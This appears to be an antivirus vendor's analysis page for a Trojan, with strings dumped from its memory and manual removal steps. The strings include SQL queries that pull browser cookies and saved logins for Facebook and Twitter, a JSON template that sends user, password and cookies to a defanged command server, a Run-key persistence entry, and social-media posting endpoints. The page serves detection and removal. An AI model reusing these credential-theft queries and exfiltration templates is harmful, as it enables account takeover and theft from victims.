GetProcessWindowStation
KERNEL32.dll
GetCPInfo
sqlite3.dll
sqlite3_aggregate_context
sqlite3_aggregate_count
sqlite3_auto_extension
sqlite3_backup_finish
sqlite3_backup_init
sqlite3_backup_pagecount
sqlite3_backup_remaining
sqlite3_backup_step
sqlite3_bind_blob
sqlite3_bind_blob64
sqlite3_bind_double
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_text
sqlite3_bind_text16
sqlite3_bind_text64
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_bind_zeroblob64
sqlite3_blob_bytes
sqlite3_blob_close
sqlite3_blob_open
sqlite3_blob_read
sqlite3_blob_reopen
sqlite3_blob_write
sqlite3_busy_handler
sqlite3_busy_timeout
sqlite3_cancel_auto_extension
sqlite3_changes
sqlite3_clear_bindings
sqlite3_close
sqlite3_close_v2
sqlite3_collation_needed
sqlite3_collation_needed16
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_bytes16
sqlite3_column_count
sqlite3_column_database_name
sqlite3_column_database_name16
sqlite3_column_decltype
sqlite3_column_decltype16
sqlite3_column_double
sqlite3_column_int
sqlite3_column_int64
sqlite3_column_name
sqlite3_column_name16
sqlite3_column_origin_name
sqlite3_column_origin_name16
sqlite3_column_table_name
sqlite3_column_table_name16
sqlite3_column_text
sqlite3_column_text16
sqlite3_column_type
sqlite3_column_value
sqlite3_commit_hook
sqlite3_compileoption_get
sqlite3_compileoption_used
sqlite3_complete
sqlite3_complete16
sqlite3_config
sqlite3_context_db_handle
sqlite3_create_collation
sqlite3_create_collation16
sqlite3_create_collation_v2
sqlite3_create_function
sqlite3_create_function16
sqlite3_create_function_v2
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_data_count
sqlite3_db_config
sqlite3_db_filename
sqlite3_db_handle
sqlite3_db_mutex
sqlite3_db_readonly
sqlite3_db_release_memory
sqlite3_db_status
sqlite3_declare_vtab
sqlite3_enable_load_extension
sqlite3_enable_shared_cache
sqlite3_errcode
sqlite3_errmsg
sqlite3_errmsg16
sqlite3_errstr
sqlite3_exec
sqlite3_expired
sqlite3_extended_errcode
sqlite3_extended_result_codes
sqlite3_file_control
sqlite3_finalize
sqlite3_free
sqlite3_free_table
sqlite3_get_autocommit
sqlite3_get_auxdata
sqlite3_get_table
sqlite3_global_recover
sqlite3_initialize
sqlite3_interrupt
sqlite3_key
sqlite3_key_v2
sqlite3_last_insert_rowid
sqlite3_libversion
sqlite3_libversion_number
sqlite3_limit
sqlite3_load_extension
sqlite3_log
sqlite3_malloc
sqlite3_malloc64
sqlite3_memory_alarm
sqlite3_memory_highwater
sqlite3_memory_used
sqlite3_mprintf
sqlite3_msize
sqlite3_mutex_alloc
sqlite3_mutex_enter
sqlite3_mutex_free
sqlite3_mutex_leave
sqlite3_mutex_try
sqlite3_next_stmt
sqlite3_open
sqlite3_open16
sqlite3_open_v2
sqlite3_os_end
sqlite3_os_init
sqlite3_overload_function
sqlite3_prepare
sqlite3_prepare16
sqlite3_prepare16_v2
sqlite3_prepare_v2
sqlite3_profile
sqlite3_progress_handler
sqlite3_randomness
sqlite3_realloc
sqlite3_realloc64
sqlite3_rekey
sqlite3_rekey_v2
sqlite3_release_memory
sqlite3_reset
sqlite3_reset_auto_extension
sqlite3_result_blob
sqlite3_result_blob64
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error16
sqlite3_result_error_code
sqlite3_result_error_nomem
sqlite3_result_error_toobig
sqlite3_result_int
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_subtype
sqlite3_result_text
sqlite3_result_text16
sqlite3_result_text16be
sqlite3_result_text16le
sqlite3_result_text64
sqlite3_result_value
sqlite3_result_zeroblob
sqlite3_result_zeroblob64
sqlite3_rollback_hook
sqlite3_rtree_geometry_callback
sqlite3_rtree_query_callback
sqlite3_set_authorizer
sqlite3_set_auxdata
sqlite3_shutdown
sqlite3_sleep
sqlite3_snprintf
sqlite3_soft_heap_limit
sqlite3_soft_heap_limit64
sqlite3_sourceid
sqlite3_sql
sqlite3_status
sqlite3_status64
sqlite3_step
sqlite3_stmt_busy
sqlite3_stmt_readonly
sqlite3_stmt_status
sqlite3_strglob
sqlite3_stricmp
sqlite3_strnicmp
sqlite3_table_column_metadata
sqlite3_test_control
sqlite3_thread_cleanup
sqlite3_threadsafe
sqlite3_total_changes
sqlite3_trace
sqlite3_transfer_bindings
sqlite3_update_hook
sqlite3_uri_boolean
sqlite3_uri_int64
sqlite3_uri_parameter
sqlite3_user_add
sqlite3_user_authenticate
sqlite3_user_change
sqlite3_user_data
sqlite3_user_delete
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes16
sqlite3_value_double
sqlite3_value_dup
sqlite3_value_free
sqlite3_value_int
sqlite3_value_int64
sqlite3_value_numeric_type
sqlite3_value_subtype
sqlite3_value_text
sqlite3_value_text16
sqlite3_value_text16be
sqlite3_value_text16le
sqlite3_value_type
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vmprintf
sqlite3_vsnprintf
sqlite3_vtab_config
sqlite3_vtab_on_conflict
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_wal_checkpoint_v2
sqlite3_wal_hook
sqlite3_win32_is_nt
sqlite3_win32_mbcs_to_utf8
sqlite3_win32_set_directory
sqlite3_win32_sleep
sqlite3_win32_utf8_to_mbcs
sqlite3_win32_write_debug
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2,292}: ;
7074787<7
)0:0&171
? ?$?(?,?
2 2.272^2
6(7,7074709
< <$<(<,<0<4<8<
8Œ8-:2:o:t:
6(7,70747|7
0 0$0(0,0004080
Software\\Microsoft\\Windows\\CurrentVersion\\Run
\\.\PhysicalDrive0000000-000000-000000-000000-000000
@Windows 10
Windows Server Technical Preview
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2
Windows 2000
Windows XP
Windows Server 2003 R2
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003
Windows 98
Web Server Edition
{"code":"{Code}","type":{type},"ver":"{Ver}","browser":"{Browser}","user":"{User}","pass":"{Pass}","cookies":"{Cookies}","aid":{Aid},"utype":{uType}}
{Pass}
hXXp://api.faceboolad.com/api//send
WinHttp.WinHttpRequest.5.1
hXXp://VVV.facebook.com
Server-Key
Chrome
Firefox
facebook.com
select name,encrypted_value from cookies where host_key = '.facebook.com'
\Local\Google\Chrome\User Data
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies
hXXps://VVV.facebook.com/
select name,value from moz_cookies where host = '.facebook.com'
\Roaming\Mozilla\Firefox\Profiles
\cookies.sqlite
Login Data
select username_value, password_value, signon_realm from logins
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36
hXXp://api.faceboolad.com/api//GetTask?code=
[ImageUrl]
Dalvik/2.1.0 (Linux; U; Android 6.0.1; MI NOTE LTE MIUI/6.8.11)
twitter.com
select name,encrypted_value from cookies where host_key = '.twitter.com'
hXXps://VVV.twitter.com/
select name,value from moz_cookies where host = '.twitter.com'
hXXps://m.facebook.com/
hXXps://VVV.facebook.com/settings
VBScript.RegExp
hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=8
fb_dtsg={fb_dtsg}&charset_test=€,´,€,´,水,Д,Є&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message=&view_privacy=
hXXps://m.facebook.com/home.php
hXXps://m.facebook.com
hXXps://VVV.facebook.com/notes/composer/photos/?thumb_height=116&thumb_width=149&av={c_user}&dpr=1
hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=7&ref=wizard
fb_dtsg={fb_dtsg}&charset_test=€,´,€,´,水,Д,Є&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message={text}&view_post=发布
hXXps://m.facebook.com/home.php?ref=wizard&_rdr
hXXps://m.facebook.com/composer/mbasic/?csid=94c178a8-8774-424a-8c53-9994984e3fba&incparms[0]=xc_message&av={c_user}
------WebKitFormBoundarydDyitWHTKuC21cBZ
€,´,€,´,水,Д,Є
94c178a8-8774-424a-8c53-9994984e3fba
web_m_touch
发布
Content-Disposition: form-data; name="file0"; filename="test.jpg"
------WebKitFormBoundarydDyitWHTKuC21cBZ--
hXXps://m.facebook.com/composer/mbasic/?mnt_query&csid=94c178a8-8774-424a-8c53-9994984e3fba
multipart/form-data; boundary=----WebKitFormBoundarydDyitWHTKuC21cBZ
hXXps://m.facebook.com/home.php?stype=phs&sk=live&gfid=
hXXps://VVV.facebook.com/notes/composer/?dpr=1
hXXps://VVV.facebook.com
hXXps://VVV.facebook.com/notes
hXXps://VVV.facebook.com/notes/composer/upload/coverphoto/?media_type=photo¬e_id={NoteId}&__a=1&fb_dtsg={fb_dtsg}
------WebKitFormBoundaryy1orVA8O3OLUfzBE
Content-Disposition: form-data; name="file"; filename="test.jpg"
------WebKitFormBoundaryy1orVA8O3OLUfzBE--
multipart/form-data; boundary=----WebKitFormBoundaryy1orVA8O3OLUfzBE
hXXps://VVV.facebook.com/notes/composer/publish/?av={c_user}&dpr=1
{"offset":{offset},"length":{length},"key":{Index}}
{URL}
"{Index}":{"id":null,"type":7,"data":{"url":"{URL}"}}
hXXps://m.facebook.com/friends/center/friends/?ppk={page}&tid=u_u_0
hXXps://m.facebook.com/friends/center/friends/?mff_nav=1&fb_ref=fbm&ref=bookmarks
XMLHttpRequest
hXXps://mobile.twitter.com/settings
hXXps://api.twitter.com/1.1/users/lookup.json?include_blocking=true&include_blocked_by=true&include_can_dm=true&include_followed_by=true&include_mute_edge=true&screen_name=
Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs=1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA
hXXps://api.twitter.com/1.1/friendships/create.json
hXXps://api.twitter.com/1.1/statuses/update.json
&media_type=image/jpeg
hXXps://upload.twitter.com/i/media/upload.json?command=INIT&total_bytes=
hXXps://mobile.twitter.com/compose/tweet
hXXps://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=
------WebKitFormBoundaryUbnK77J90KHiGB65
------WebKitFormBoundaryUbnK77J90KHiGB65--
hXXps://mobile.twitter.com
multipart/form-data; boundary=----WebKitFormBoundaryUbnK77J90KHiGB65
hXXps://upload.twitter.com/i/media/upload.json?command=FINALIZE&media_id=
select count(*) from sqlite_master where type='table' and tbl_name='
select tbl_name from sqlite_master where type='table' and tbl_name<>'sqlite_sequence'
application/x-www-form-urlencoded
SetClientCertificate
TempObj=JSON.parse(str);
var obj=JSON.parse(str);
Lobj.push(obj);
return Lobj.length;
function GetAllKey(){
Lobj = JSON.parse(str);
var str=JSON.stringify(Lobj);
return Lobj.str;
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf())
? this.getUTCFullYear()   '-'  
f(this.getUTCMonth()   1)   '-'  
f(this.getUTCDate())   'T'  
f(this.getUTCHours())   ':'  
f(this.getUTCMinutes())   ':'  
f(this.getUTCSeconds())   'Z'
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"'   string.replace(escapable, function (a) {
: '\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
v = partial.length === 0
? '[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']'
: '['   partial.join(',')   ']';
length = rep.length;
partial.push(quote(k)   (gap ? ': ' : ':')   v);
if (Object.prototype.hasOwnProperty.call(value, k)) {
v = partial.length === 0
? '{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}'
: '{'   partial.join(',')   '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000'   a.charCodeAt(0).toString(16)).slice(-4);
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
throw new SyntaxError('JSON.parse');
JSON.stringify(Lobj['
Lobj.push("
Lobj.push(
Lobj.push('
Lobj.length
JSON.stringify(Lobj[
Lobj.splice(
JSON.stringify(Lobj
GetAllKey
var keyStr = "ABCDEFGHIJKLMNOP"  
for (var i=0; i<strNative.length; i  ) {
var c = strNative.charAt(i);
var cc = strNative.charCodeAt(i);
return hexChars.charAt(nH)   hexChars.charAt(nL);
var posTo = strAscii.indexOf("\\u", posFrom);
output  = strAscii.substring(posFrom, posTo);
output  = toChar(strAscii.substr(posTo, 6));
posTo = strAscii.indexOf("\\u", posFrom);
output  = strAscii.substr(posFrom);
if (str.substr(0, 2) != "\\u") return str;
for (var i=2; i<str.length; i  ) {
var cc = str.charCodeAt(i);
return String.fromCharCode(code);
function URlEncode(temp){return(encodeURIComponent(temp));}
function URlDecode(temp){return(decodeURIComponent(temp));}
function Utf8Decode(temp){return(URlDecode(decodeURI(temp)));}
URlDecode
URlEncode
Adodb.Stream
kernel32.dll
advapi32.dll
shlwapi.dll
ntdll.dll
Kernel32.dll
ole32.dll
shell32.dll
crypt32.dll
wininet.dll
psapi.dll
RegOpenKeyA
RegCloseKey
MsgWaitForMultipleObjects
program internal error number is %d.
:"%s"
:"%s".
c:\%original file name%.exe
Vkk\.BP
O%ST/D
^}.Ix
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
operator
`5/.LV@t
ez%sw
%DtHo%
S.BB2
kcxS%UR
.ooNM
.QakOZL
Z9.Is
9R%dy
|O%7X3
/:.UV
!{.Nc20
7.EIS
%d*Nt
p^.cq
VdS%SJ
;z%Dr
2.OX^)
@!<.RUd
9.fsG
F^?/.Xe
4S,]%Di
F^>..Xg
X&UTz
"%fgJ
;8-Q}n
$.dqB
3.JZ]-
%uY8:
cMD)#
L_0'.Wm
48.nZ
i(\;$%c
n.UMv8
6Z)#.Km
%U;M%]
Mr.hPaOx
%/%fq
B%X-\:|
d.RFw?
'.Uiv
'S&N%C
x%SZ~?
%U%O%C
&U%O%C
~%S\}>
e.RFv?
x%S[|9
y%S[}>
e.QFw<
M&E%U]
.StD)
n%XL}5
'U&N%C
z%XX}4
{%SZ}>
IU! %Fi
x%UZ|9
x%UZ}8
L^<%.Zn
>;.jY
]do%ST&TQ
wEb*.
N.EyOc`Wl~
%s9?}
%Scj^
N OF%U
&*4.HLWv$
0 0<0@0`0
CRYPT32.dll
:%xtI
Y0%dMq'
w.XiC
[4E%X
W>.ZS
O.ZVi
%S%Mw
Z.TJM
.PtZ;l
!CZ%d
"Z%sJ
B!#%xKa
/u.iA
DTM.mX
.rdfZ9
F.QY[Z=s<U
U'Z%c_
%Ze.xvu
xzX%U
td.Ys/
J.SX#
zX.xB
c@.ZM4
:%C,w
Zv2%u
9.LxZ
V0"_
^%_:&4\"
t.IWTi[ri
GP.ZL
X=$V%d
.tR9Za
[.ar_
:.ZN*
%SZq0
A.Xo%C
U2.Zw
&ZmB\.MX
 .VJf
aZ.yX
.YfR`
y%.XF
PZmW.ke
bM.ZP
tQ%4X|
Y z.PwZ
\.ZX'<n
Ztcp
JJ%xXM
Z.Pg=
Z%c.#d
.jZl7
Z.VUo t
4\.vZI
:$.Zz
Z:h%d
Xj%CYZ
jÔZ
Y ,.IZoe
%x(Zp
ZFtP
Z*,_.Zy
K%XloU-
[.msT&
vZ%cM
ZG .Vj
_Z%u7
-M.hZ
6%c:~0
>%CZl
OZ.KI
.qoT*
ZcjW%U
.Dk=Z
.tAT=
h%sXZ
YZ.tr
[h^%UI
.EZ;AZw
A.xzW
X.ke[c
^W%X<o[
.Zba0'o9U(p
Hi.EP
beD*%x
#zq%F
!!.WF
.FU"^
ADVAPI32.dll
PSAPI.DLL
WININET.dll
-9.GV
n.d%F
8ole32.dll
SHLWAPI.dll
SHELL32.dll
USER32.dll
B8%C'
OLEAUT32.dll
Mnl%d
m=CmD\
e.GXp!
.sy7t[6
C.Zsf
^x3@%CV
,.zoNg\
v1%F;
%(~WR.qC8
œV]{
O:J%S9
nP%Cq
f:\ET
÷zc
EQ.qe
%x kg7
G%X2X
hI.paz
WZ%u_Gq
U%ct=
5B.wc
I, %8x5}
/.ZhS
)%XZd
~%D-".$I$#EyX
1`.ZY
,.nDnPn
J.JNJ
.Obv7
-3N}E
ForceRemove {148D5E31-0D7E-44EE-B5C2-291B822351EA} = s 'TheGfxUILauncher Class'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{D6DCE90A-557C-40D8-ABE9-BD1336674C95}'
stdole2.tlbWWW
Created by MIDL version 8.00.0603 at Mon Apr 04 10:47:17 2016
.---(((('
(-((('('''
>?<<33310
3311100
j-h}I'
jl).aE
x.Len
x:\fu
mscoree.dll
KERNEL32.DLL
WUSER32.DLL
SQLite
SQLite3 Database Library
3.9.2.1
SQLite3
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:
6.15.10.4425
GFXUIEX.EXE

%original file name%.exe_2340_rwx_00542000_0011C000:

Vkk\.BP
O%ST/D
^}.Ix
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
`5/.LV@t
c:\%original file name%.exe
ez%sw
%DtHo%
S.BB2
kcxS%UR
.ooNM
.QakOZL
Z9.Is
9R%dy
|O%7X3
/:.UV
!{.Nc20
7.EIS
%d*Nt
p^.cq
VdS%SJ
;z%Dr
2.OX^)
@!<.RUd
9.fsG
F^?/.Xe
4S,]%Di
F^>..Xg
X&UTz
"%fgJ
;8-Q}n
$.dqB
3.JZ]-
%uY8:
cMD)#
L_0'.Wm
48.nZ
i(\;$%c
n.UMv8
6Z)#.Km
%U;M%]
Mr.hPaOx
%/%fq
B%X-\:|
d.RFw?
'.Uiv
'S&N%C
x%SZ~?
%U%O%C
&U%O%C
~%S\}>
e.RFv?
x%S[|9
y%S[}>
e.QFw<
M&E%U]
.StD)
n%XL}5
'U&N%C
z%XX}4
{%SZ}>
IU! %Fi
x%UZ|9
x%UZ}8
L^<%.Zn
>;.jY
]do%ST&TQ
wEb*.
N.EyOc`Wl~
%s9?}
%Scj^
N OF%U
&*4.HLWv$
0 0<0@0`0
KERNEL32.DLL
mscoree.dll
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:

%original file name%.exe_2340_rwx_0076D000_00001000:

WININET.dll
user32.dll
-9.GV

%original file name%.exe_2340_rwx_00772000_00001000:

SHLWAPI.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "%original file name%.exe -start" = "c:\%original file name%.exe -start"

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now